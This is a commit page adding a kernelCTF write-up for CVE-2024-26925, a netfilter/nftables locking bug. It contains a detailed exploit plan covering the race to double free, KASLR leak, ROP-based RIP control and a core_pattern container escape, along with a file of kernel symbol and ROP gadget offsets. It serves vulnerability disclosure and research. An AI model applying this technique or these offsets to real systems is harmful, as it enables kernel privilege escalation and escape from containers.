Add kernelCTF CVE-2024-26925_lts_cos (#106)
* Update CVE-2024-26925_lts_cos

* Use softlink to merge all files

* Update exploit.md

* Update vulnerability.md
HexRabbit authored Jul 3, 2024
1 parent fa6e35b commit 5c8c44e
Showing 21 changed files with 1,410 additions and 0 deletions.
178 changes: 178 additions & 0 deletions pocs/linux/kernelctf/CVE-2024-26925_lts_cos/docs/exploit.md
@@ -0,0 +1,178 @@
# Exploit details
The vulnerability is a locking issue in `__nf_tables_abort()`: its call to `nf_tables_module_autoload()`
releases the commit mutex, which allows the GC sequence protection to be bypassed. To exploit this vulnerability,
we must find a reliable way to race the abort thread against the set GC thread. Doing so turns this locking
issue into a double-free primitive.

## Module Autoload

Since nftables object types (e.g., `nft_tunnel_obj_type`, `nft_quota_obj_type`) might reside in external kernel modules,
a request for a type that is not currently registered first adds the module name to `nft_net->module_list`.
The kernel then attempts to load the corresponding module during the abort phase via `nf_tables_module_autoload()`.

Therefore, `nf_tables_module_autoload()` can be triggered by requesting a non-existent object type in a batch commit.

```c
static const struct nft_object_type *
nft_obj_type_get(struct net *net, u32 objtype, u8 family)
{
    const struct nft_object_type *type;

    rcu_read_lock();
    type = __nft_obj_type_get(objtype, family);

    // ...

#ifdef CONFIG_MODULES
    if (type == NULL) { // if type does not exist
        if (nft_request_module(net, "nft-obj-%u", objtype) == -EAGAIN)
            return ERR_PTR(-EAGAIN);
    }
#endif
    return ERR_PTR(-ENOENT);
}
```
```c
__printf(2, 3) int nft_request_module(struct net *net, const char *fmt, ...)
{
    // ...
    nft_net = nft_pernet(net);
    list_for_each_entry(req, &nft_net->module_list, list) {
        if (!strcmp(req->module, module_name)) {
            if (req->done)
                return 0;
            /* A request to load this module already exists. */
            return -EAGAIN;
        }
    }
    req = kmalloc(sizeof(*req), GFP_KERNEL);
    if (!req)
        return -ENOMEM;
    req->done = false;
    strscpy(req->module, module_name, MODULE_NAME_LEN);
    list_add_tail(&req->list, &nft_net->module_list); // add to request list
    return -EAGAIN;
}
```

## Race to Double Free

With this vulnerability, we can make the set GC procedure record the GC sequence and acquire the mutex lock
within the call to `__nf_tables_abort()` to bypass the GC sequence check. The goal is to free
the same set element twice during the handling of a batch commit.

The race process is as follows:
- New `setelem A`
- New unknown type object (trigger `__nf_tables_abort()`)
- `nft_rhash_gc()` records expired `setelem A`
- `setelem A` is unlinked from the set and `kfree`'d
- module autoload releases mutex lock
- `nft_trans_gc_work_done()` acquires mutex lock, bypassing GC sequence check
- `setelem A` is `kfree`'d a second time

To increase the success rate of the race (and capture the kernelctf slot), we need to enlarge the two time windows in the race process:
1. For the GC thread, we want its timer to wake up and record `setelem A` after `__nf_tables_abort()` starts but before `setelem A` is removed from the set. Otherwise, `setelem A` cannot be recorded.
2. The module loading time should be long enough to ensure that `nft_trans_gc_work_done()` can acquire the mutex lock.

To delay the removal of `setelem A` in `__nf_tables_abort()` from the set, we can add many operations after the creation of
`setelem A` in the batch commit. Since `__nf_tables_abort()` processes batch commit operations in reverse order,
these operations will be processed before removing `setelem A`.

In order to maximize this delay, we pre-allocate multiple anonymous sets (`NFT_SET_MAP`) with many elements,
reference them through `dynset` expressions, and delete these expressions via `NFT_MSG_DELRULE` at the end of the batch commit.
This ensures that `nft_map_activate()` is called to traverse all set elements during the abort process, delaying the removal of `setelem A`.

For the module autoload part, entries waiting for autoload are not removed from `nft_net->module_list`
even after autoloading finishes, and `nf_tables_module_autoload()` always tries to load every entry in the list without
checking whether `req->done` is set. As a result, each autoload trigger reloads all previously requested types.

```c
static void nf_tables_module_autoload(struct net *net)
{
    struct nftables_pernet *nft_net = nft_pernet(net);
    struct nft_module_request *req, *next;
    LIST_HEAD(module_list);

    list_splice_init(&nft_net->module_list, &module_list);
    mutex_unlock(&nft_net->commit_mutex);
    list_for_each_entry_safe(req, next, &module_list, list) {
        request_module("%s", req->module); // called for every entry, done or not
        req->done = true;
    }
    mutex_lock(&nft_net->commit_mutex);
    list_splice(&module_list, &nft_net->module_list); // entries go back on the list
}
```
Therefore, we only need to attempt autoloading N distinct non-existent object types before
the new `setelem A` operation. Triggering autoload once more with another non-existent object type after the new `setelem A` then calls `request_module()` N+1 times.

With the above adjustments, the batch commit used in the exploit includes the following operations:
- New unknown type object (1)
- ...
- New unknown type object (N)
- New `setelem A` (kmalloc-cg-256)
- Delete all dynset expressions (deactivate all pre-allocated setelems)
- New unknown type object (N+1)
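
The growth of the autoload cost can be illustrated with a small userspace model. This is only a sketch under stated assumptions: `model_net`, `model_req`, `model_request_module()` and `model_autoload()` are hypothetical names that imitate the return values of `nft_request_module()` and the loop in `nf_tables_module_autoload()` shown above; nothing here talks to the kernel. Each pass "loads" every queued entry again, so the k-th distinct unknown type costs k calls.

```c
#include <errno.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define MODEL_MAX_REQS 16
#define MODEL_NAME_LEN 32

/* Hypothetical stand-in for struct nft_module_request. */
struct model_req {
    char name[MODEL_NAME_LEN];
    bool done;
};

/* Hypothetical stand-in for nft_net->module_list. */
struct model_net {
    struct model_req reqs[MODEL_MAX_REQS];
    size_t nreqs;
};

/* Imitates nft_request_module(): 0 if already loaded once, -EAGAIN if
 * the request is pending or was just queued. */
static int model_request_module(struct model_net *net, const char *name)
{
    for (size_t i = 0; i < net->nreqs; i++) {
        if (strcmp(net->reqs[i].name, name) == 0)
            return net->reqs[i].done ? 0 : -EAGAIN;
    }
    if (net->nreqs == MODEL_MAX_REQS)
        return -ENOMEM;
    snprintf(net->reqs[net->nreqs].name, MODEL_NAME_LEN, "%s", name);
    net->reqs[net->nreqs].done = false;
    net->nreqs++;
    return -EAGAIN;
}

/* Imitates one autoload pass: every entry is requested again, whether or
 * not it is already marked done. Returns the number of calls made. */
static unsigned int model_autoload(struct model_net *net)
{
    unsigned int calls = 0;

    for (size_t i = 0; i < net->nreqs; i++) {
        calls++; /* stands in for request_module("%s", req->module) */
        net->reqs[i].done = true;
    }
    return calls;
}
```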

By extending the two race windows mentioned above, we should be able to reliably trigger the race condition and cause a double free, right?

Actually, **no**. We were surprised to find that even if we extend the processing time of pre-allocated set elements to the scale of seconds,
`nft_rhash_gc()` still doesn't race with `__nf_tables_abort()`.

We later found that, for some reason, `nft_rhash_gc()` is not scheduled by `system_power_efficient_wq` during high CPU usage.
```c
static void nft_rhash_gc_init(const struct nft_set *set)
{
    struct nft_rhash *priv = nft_set_priv(set);

    queue_delayed_work(system_power_efficient_wq, &priv->gc_work,
                       nft_set_gc_interval(set));
}
```

In our case, re-activating all pre-allocated set elements
in `__nf_tables_abort()` causes high CPU usage, so `nft_rhash_gc()` is not scheduled.
To solve this problem, we switch the main thread to a different CPU using `set_cpu()` before the race.
Additionally, this provides a bonus: the slab allocator will not detect our double free because the same object is freed by two different CPUs.
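
The source of `set_cpu()` is not shown in this write-up. A minimal sketch of such a helper, assuming it is built on `sched_setaffinity(2)`, could look like the following. `pin_to_cpu()` and `first_allowed_cpu()` are hypothetical names introduced for illustration only.

```c
#ifndef _GNU_SOURCE
#define _GNU_SOURCE /* for cpu_set_t, the CPU_* macros and sched_setaffinity() */
#endif
#include <errno.h>
#include <sched.h>

/* Hypothetical helper: restrict the calling thread to a single CPU.
 * Returns 0 on success or a negative errno value. */
static int pin_to_cpu(int cpu)
{
    cpu_set_t mask;

    if (cpu < 0 || cpu >= CPU_SETSIZE)
        return -EINVAL;
    CPU_ZERO(&mask);
    CPU_SET(cpu, &mask);
    /* A pid of 0 means "the calling thread". */
    if (sched_setaffinity(0, sizeof(mask), &mask) != 0)
        return -errno;
    return 0;
}

/* Hypothetical helper: lowest CPU the calling thread may run on, or -1. */
static int first_allowed_cpu(void)
{
    cpu_set_t mask;

    CPU_ZERO(&mask);
    if (sched_getaffinity(0, sizeof(mask), &mask) != 0)
        return -1;
    for (int cpu = 0; cpu < CPU_SETSIZE; cpu++) {
        if (CPU_ISSET(cpu, &mask))
            return cpu;
    }
    return -1;
}
```

With a helper like this, the main thread would be moved to a CPU other than the one kept busy by the abort path before the racing batch is sent. Which CPU numbers to use depends on the target machine.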

Once we can reliably trigger the race to cause double free, the free list in kmalloc-cg-256 will be `[A, A]`.
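
Why a free list of `[A, A]` is useful can be seen in a toy model. The sketch below is not the SLUB allocator: `toy_freelist`, `toy_free()` and `toy_alloc()` are hypothetical names for a plain LIFO list with no hardening or double-free checks. It only shows that once the same object sits on the list twice, the next two allocations of that size return the same address.

```c
#include <stddef.h>

#define TOY_SLOTS 8

/* Toy LIFO free list: the most recently freed object is handed out first.
 * It performs no double-free detection at all. */
struct toy_freelist {
    void *slots[TOY_SLOTS];
    size_t count;
};

/* Push an object onto the free list. Returns 0, or -1 if the list is full. */
static int toy_free(struct toy_freelist *fl, void *obj)
{
    if (fl->count == TOY_SLOTS)
        return -1;
    fl->slots[fl->count++] = obj;
    return 0;
}

/* Pop the most recently freed object, or NULL if the list is empty. */
static void *toy_alloc(struct toy_freelist *fl)
{
    if (fl->count == 0)
        return NULL;
    return fl->slots[--fl->count];
}
```

In the exploit, the two overlapping allocations are a table's user data buffer and an `nft_object`, as described in the next section.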

## KASLR Bypass

After obtaining the double free primitive, we use the same exploit method as in [CVE-2023-4004](https://github.com/google/security-research/blob/master/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/docs/exploit.md).
Since element A now appears twice in the kmalloc-cg-256 free list, we can overlap `nft_table`'s `table->udata` with the `nft_object` object to leak `obj->ops` (address of `nft_ct_expect_obj_ops`).
- New `table A` (with `NFTA_TABLE_USERDATA` data length equals 256)
- New `object B` (`nft_ct_expect_obj`)
- Dump `table A` (leaking `object B` structure)
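
Turning the leaked `obj->ops` pointer into a kernel base is plain arithmetic. The sketch below assumes that the values in the offsets file of this commit (for example `nft_ct_expect_obj_ops = 0x1acba40` and `pop_rdi = 0x81910`) are relative to the kernel text base. `kernel_base_from_leak()` and `rebase()` are hypothetical helper names, not functions from the exploit.

```c
#include <stdint.h>

/* Offsets copied from the offsets file for this target; assumed to be
 * relative to the kernel text base. */
#define OFF_NFT_CT_EXPECT_OBJ_OPS 0x1acba40ULL
#define OFF_POP_RDI               0x81910ULL

/* The leaked value is base + offset, so subtracting the known offset
 * recovers the randomized base. */
static uint64_t kernel_base_from_leak(uint64_t leaked_obj_ops)
{
    return leaked_obj_ops - OFF_NFT_CT_EXPECT_OBJ_OPS;
}

/* Any other symbol or gadget is then base + its own offset. */
static uint64_t rebase(uint64_t kernel_base, uint64_t offset)
{
    return kernel_base + offset;
}
```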

After leaking the kernel address, restore the free list state to `[A, B, A]` to facilitate subsequent operations.

## Control RIP

At this stage, we again overlap `nft_table`'s `table->udata` with the `nft_object` object to control the `obj->ops` function table pointer, thereby controlling the RIP.

We first leak the kernel heap address that will hold the fake `obj->ops` function pointer table.
- New `table A` (with `NFTA_TABLE_USERDATA` data length equals 256)
- New `table B` (with `NFTA_TABLE_USERDATA` data length equals 256)
- New `object C` (providing `NFTA_OBJ_USERDATA`, later used for faking `obj->ops`)
- Dump `table A` (leaking `obj->udata`)

Then we reallocate the table to modify the overlapped `object C` and call `obj->ops->dump` to trigger the ROP chain.
- Delete `table A`
- New `table D` (setting `obj->ops` to `obj->udata`, setting ROP chain)
- Dump `object C` (triggering ROP chain)
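
The effect of the overlap can be shown with a harmless userspace toy. It is a sketch only: all `toy_*` names are hypothetical, `TOY_OPS_OFFSET` is an arbitrary value rather than the real offset of `obj->ops`, and the fake table is a static object instead of attacker-supplied heap data. One 256-byte chunk is written through a "user data" view and dispatched through an "object" view.

```c
#include <stddef.h>
#include <string.h>

#define TOY_CHUNK_SIZE 256
#define TOY_OPS_OFFSET 64 /* arbitrary; not the real offset of obj->ops */

struct toy_ops {
    int (*dump)(void);
};

static int toy_real_dump(void) { return 1; }
static int toy_fake_dump(void) { return 2; }

static const struct toy_ops toy_real_ops = { .dump = toy_real_dump };
static const struct toy_ops toy_fake_ops = { .dump = toy_fake_dump };

/* One chunk that two logical owners believe is theirs. */
struct toy_chunk {
    unsigned char bytes[TOY_CHUNK_SIZE];
};

/* "Object" view: store the legitimate ops pointer inside the chunk. */
static void toy_obj_init(struct toy_chunk *c)
{
    const struct toy_ops *ops = &toy_real_ops;

    memset(c->bytes, 0, sizeof(c->bytes));
    memcpy(c->bytes + TOY_OPS_OFFSET, &ops, sizeof(ops));
}

/* "User data" view: copy caller-controlled bytes into the same chunk. */
static int toy_udata_write(struct toy_chunk *c, size_t off,
                           const void *data, size_t len)
{
    if (off > sizeof(c->bytes) || len > sizeof(c->bytes) - off)
        return -1;
    memcpy(c->bytes + off, data, len);
    return 0;
}

/* "Object" view again: dispatch through whatever ops pointer is stored. */
static int toy_obj_dump(const struct toy_chunk *c)
{
    const struct toy_ops *ops;

    memcpy(&ops, c->bytes + TOY_OPS_OFFSET, sizeof(ops));
    return ops->dump();
}
```

After a write through the user data view replaces the stored pointer, `toy_obj_dump()` calls the replacement function, which is the same control-flow change the steps above achieve with `table D` and `object C`.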

## Container Escape

We reuse the exploit technique from [CVE-2023-4622](https://github.com/google/security-research/blob/master/pocs/linux/kernelctf/CVE-2023-4622_lts/docs/exploit.md#achieve-container-escape).

By rewriting `core_pattern` to `|/proc/%P/fd/<fd number>` and placing the binary in the corresponding fd via `memfd_create()`,
we can execute any binary outside the container when a coredump is triggered.
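
As a small illustration of the string involved, the sketch below formats the pattern for a given file descriptor and creates an anonymous in-memory file with `memfd_create(2)`. `format_core_pattern()` and `make_payload_fd()` are hypothetical helper names, and writing the pattern into kernel memory is outside the scope of this sketch. Note that `%P` must be escaped as `%%P` in a `printf`-style format; in `core_pattern`, `%P` expands to the PID of the dumped process as seen in the initial PID namespace, which is why the path resolves from outside the container.

```c
#ifndef _GNU_SOURCE
#define _GNU_SOURCE /* for memfd_create() */
#endif
#include <stddef.h>
#include <stdio.h>
#include <sys/mman.h>

/* Hypothetical helper: write "|/proc/%P/fd/<fd>" into buf.
 * Returns the string length, or -1 if buf is too small. */
static int format_core_pattern(char *buf, size_t len, int fd)
{
    int n = snprintf(buf, len, "|/proc/%%P/fd/%d", fd);

    return (n < 0 || (size_t)n >= len) ? -1 : n;
}

/* Hypothetical helper: create an anonymous in-memory file that a binary
 * could be written to. The name is only a debugging label. */
static int make_payload_fd(void)
{
    return memfd_create("payload", 0);
}
```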
174 changes: 174 additions & 0 deletions pocs/linux/kernelctf/CVE-2024-26925_lts_cos/docs/vulnerability.md
@@ -0,0 +1,174 @@
# Vulnerability Details
A locking issue was found in the Linux kernel netfilter/nftables subsystem (`net/netfilter/nf_tables_api.c`).
It breaks an assumption made by the asynchronous set GC and can be used to cause a double free.

The asynchronous set GC (`nft_rhash_gc`, for example) does not acquire the commit lock while doing its work.
Instead, it uses the GC sequence (`gc_seq`) mechanism to protect itself from racing with a transaction.
At the beginning of `nft_rhash_gc`, it saves the current GC sequence and allocates a GC transaction
to store information. It then traverses the set, records every expired set element in the GC transaction,
and finally calls `nft_trans_gc_queue_async_done(gc)`.

```c
static void nft_rhash_gc(struct work_struct *work)
{
    // ...
    gc_seq = READ_ONCE(nft_net->gc_seq); // save GC sequence

    if (nft_set_gc_is_pending(set))
        goto done;

    gc = nft_trans_gc_alloc(set, gc_seq, GFP_KERNEL);
    if (!gc)
        goto done;

    // ...
    while ((he = rhashtable_walk_next(&hti))) {
        // check if setelem expired
        if (!nft_set_elem_expired(&he->ext))
            continue;

        // ...
        nft_trans_gc_elem_add(gc, he);
    }

    if (gc)
        nft_trans_gc_queue_async_done(gc);

    // ...
}
```
The function `nft_trans_gc_queue_async_done(gc)` saves the GC transaction into a global list and eventually schedules
`nft_trans_gc_work()` to run. `nft_trans_gc_work()` then retrieves the GC transaction and calls `nft_trans_gc_work_done()`
to check the GC sequence.
```c
static void nft_trans_gc_work(struct work_struct *work)
{
    // ...
    list_for_each_entry_safe(trans, next, &trans_gc_list, list) {
        list_del(&trans->list);
        if (!nft_trans_gc_work_done(trans)) { // do the check here
            nft_trans_gc_destroy(trans);
            continue;
        }
        call_rcu(&trans->rcu, nft_trans_gc_trans_free);
    }
}
```

The function `nft_trans_gc_work_done()` first acquires the commit lock and then compares the saved GC sequence
with the current one. Every critical section that modifies the control plane is surrounded by `nft_gc_seq_begin()`
and `nft_gc_seq_end()`, both of which increment the current GC sequence (`nft_net->gc_seq`). If the two values differ,
the GC raced with a transaction and the state of the set may have changed, so the function returns false
to stop processing this GC transaction.


```c
static bool nft_trans_gc_work_done(struct nft_trans_gc *trans)
{
    struct nftables_pernet *nft_net;
    struct nft_ctx ctx = {};

    nft_net = nft_pernet(trans->net);

    mutex_lock(&nft_net->commit_mutex); // acquire global mutex

    /* Check for race with transaction, otherwise this batch refers to
     * stale objects that might not be there anymore. Skip transaction if
     * set has been destroyed from control plane transaction in case gc
     * worker loses race.
     */
    if (READ_ONCE(nft_net->gc_seq) != trans->seq || trans->set->dead) { // check gc sequence to prevent race
        mutex_unlock(&nft_net->commit_mutex);
        return false;
    }

    ctx.net = trans->net;
    ctx.table = trans->set->table;

    nft_trans_gc_setelem_remove(&ctx, trans);
    mutex_unlock(&nft_net->commit_mutex);

    return true;
}
```
However, the GC sequence mechanism only works under the assumption that the commit lock is never released
inside the critical section between `nft_gc_seq_begin()` and `nft_gc_seq_end()`. Otherwise, a GC thread
may record an expired object and obtain the released commit lock within the same `gc_seq`, thus bypassing the GC sequence check.

`__nf_tables_abort()` violates this assumption. The function is surrounded by `nft_gc_seq_begin()` and `nft_gc_seq_end()`,
and when it receives the action `NFNL_ABORT_AUTOLOAD`, it calls `nf_tables_module_autoload()` to process the module requests.
That function releases the commit lock before processing the module requests, which breaks the GC sequence
assumption and leads to a double free.
```c
static int nf_tables_abort(struct net *net, struct sk_buff *skb,
                           enum nfnl_abort_action action)
{
    // ...
    gc_seq = nft_gc_seq_begin(nft_net); // gc_seq++
    ret = __nf_tables_abort(net, action);
    nft_gc_seq_end(nft_net, gc_seq); // gc_seq++
    mutex_unlock(&nft_net->commit_mutex);
    return ret;
}

static int __nf_tables_abort(struct net *net, enum nfnl_abort_action action)
{
    // ...
    if (action == NFNL_ABORT_AUTOLOAD)
        nf_tables_module_autoload(net); // load modules
    else
        nf_tables_module_autoload_cleanup(net);
    return 0;
}

static void nf_tables_module_autoload(struct net *net)
{
    struct nftables_pernet *nft_net = nft_pernet(net);
    struct nft_module_request *req, *next;
    LIST_HEAD(module_list);

    list_splice_init(&nft_net->module_list, &module_list);
    mutex_unlock(&nft_net->commit_mutex); // BUG: release mutex lock inside GC sequence critical section
    list_for_each_entry_safe(req, next, &module_list, list) {
        request_module("%s", req->module);
        req->done = true;
    }
    mutex_lock(&nft_net->commit_mutex);
    list_splice(&module_list, &nft_net->module_list);
}
```
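The broken assumption can be reproduced in a deterministic, single-threaded model. This is only a sketch: `seq_model`, `gc_snapshot()`, `gc_check_passes()` and `abort_lets_gc_through()` are hypothetical names, the mutex is a boolean flag, and no real concurrency is involved. The model compares the vulnerable ordering (lock dropped between the two sequence bumps) with the ordering where autoload runs after the second bump.

```c
#include <stdbool.h>

/* Hypothetical model of the two fields that matter for the check. */
struct seq_model {
    unsigned int gc_seq;
    bool commit_mutex_held;
};

/* GC worker, first half: remember the sequence without taking the lock. */
static unsigned int gc_snapshot(const struct seq_model *m)
{
    return m->gc_seq;
}

/* GC worker, second half: it can only proceed once the mutex is free,
 * and only if the sequence is unchanged since the snapshot. */
static bool gc_check_passes(const struct seq_model *m, unsigned int snap)
{
    if (m->commit_mutex_held)
        return false; /* the real worker would block here */
    return m->gc_seq == snap;
}

/* Runs one abort and reports whether a snapshot taken during the abort
 * passes the check while autoload has the mutex released. */
static bool abort_lets_gc_through(bool autoload_inside_seq)
{
    struct seq_model m = { .gc_seq = 0, .commit_mutex_held = true };
    unsigned int snap;
    bool passed;

    m.gc_seq++;             /* nft_gc_seq_begin() */
    snap = gc_snapshot(&m); /* GC records expired elements mid-abort */

    if (autoload_inside_seq) {
        m.commit_mutex_held = false; /* autoload drops the mutex */
        passed = gc_check_passes(&m, snap);
        m.commit_mutex_held = true;
        m.gc_seq++;         /* nft_gc_seq_end() */
    } else {
        m.gc_seq++;         /* nft_gc_seq_end() happens first */
        m.commit_mutex_held = false; /* autoload afterwards */
        passed = gc_check_passes(&m, snap);
        m.commit_mutex_held = true;
    }
    return passed;
}
```

In this model, `abort_lets_gc_through(true)` returns true because the sequence has not changed when the mutex becomes available, while `abort_lets_gc_through(false)` returns false because the second increment has already invalidated the snapshot.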

## Requirements to trigger the vulnerability
- Capabilities: `CAP_NET_ADMIN` is required.
- Kernel configuration: `CONFIG_NETFILTER`, `CONFIG_NF_TABLES`
- User namespace: this vulnerability requires `CAP_NET_ADMIN`, which is not usually granted to normal users, so we use an unprivileged user namespace to obtain the capability.

## Commit which introduced the vulnerability
- The vulnerability was introduced in Linux v6.5, with commit [720344340fb9be2765bbaab7b292ece0a4570eae](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=720344340fb9be2765bbaab7b292ece0a4570eae)
- An incomplete fix to new GC transaction API introduced this vulnerability.

## Commit which fixed the vulnerability
- The vulnerability was fixed in Linux v6.9-rc3, with commit [0d459e2ffb541841714839e8228b845458ed3b27](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=0d459e2ffb541841714839e8228b845458ed3b27)
- The commit moves the call to `nf_tables_module_autoload()` after `nft_gc_seq_end()` to fix the check.

## Affected kernel versions
- Linux v6.5 ~ v6.9-rc2 are affected by this vulnerability
- For LTS versions:
  - v5.15.134 ~
  - v6.1.56 ~

## Affected component, subsystem
- netfilter/nf_tables

## Cause (UAF, BoF, race condition, double free, refcount overflow, etc)
- Locking issue leads to double free

## Which syscalls or syscall parameters are needed to be blocked to prevent triggering the vulnerability? (If there is any easy way to block it.)
- Disabling syscalls for the netfilter (specifically, nftables) subsystem (e.g. `socket`, `sendmsg` with a netlink socket) prevents this vulnerability.
- Disabling syscalls for unprivileged user namespaces (e.g. `clone`, `unshare`) reduces the attack surface, since the netfilter subsystem requires `CAP_NET_ADMIN` to use.
Binary file not shown.
@@ -0,0 +1,16 @@
#include <stddef.h>
#include <unistd.h>
size_t nft_ct_expect_obj_type = 0x271c120;
size_t nft_ct_expect_obj_ops = 0x1acba40;
size_t core_pattern = 0x259e7a0;
size_t rcu_read_unlock = 0x120127b; // Symbol '__rcu_read_unlock' not found. (use ret here)
size_t copy_from_user = 0x776520;
size_t delay_loop = 0x7d6c70;

size_t pop_rdi = 0x81910;
size_t pop_rsi = 0x1a9d38;
size_t pop_rdx = 0x1a9725;
size_t pop_3 = 0x68158; // pop r12 ; pop rbp ; pop rbx ; ret
size_t pop_rsp_ret = 0x106deb;
size_t add_rsp_0x50 = 0x190786; // add rsp, 0x50 ; jmp 0xffffffff82203980 (ret)
size_t push_rsi_jmp_deref_rsi_0x39 = 0x8a2d27; // push rsi ; jmp qword ptr [rsi + 0x39]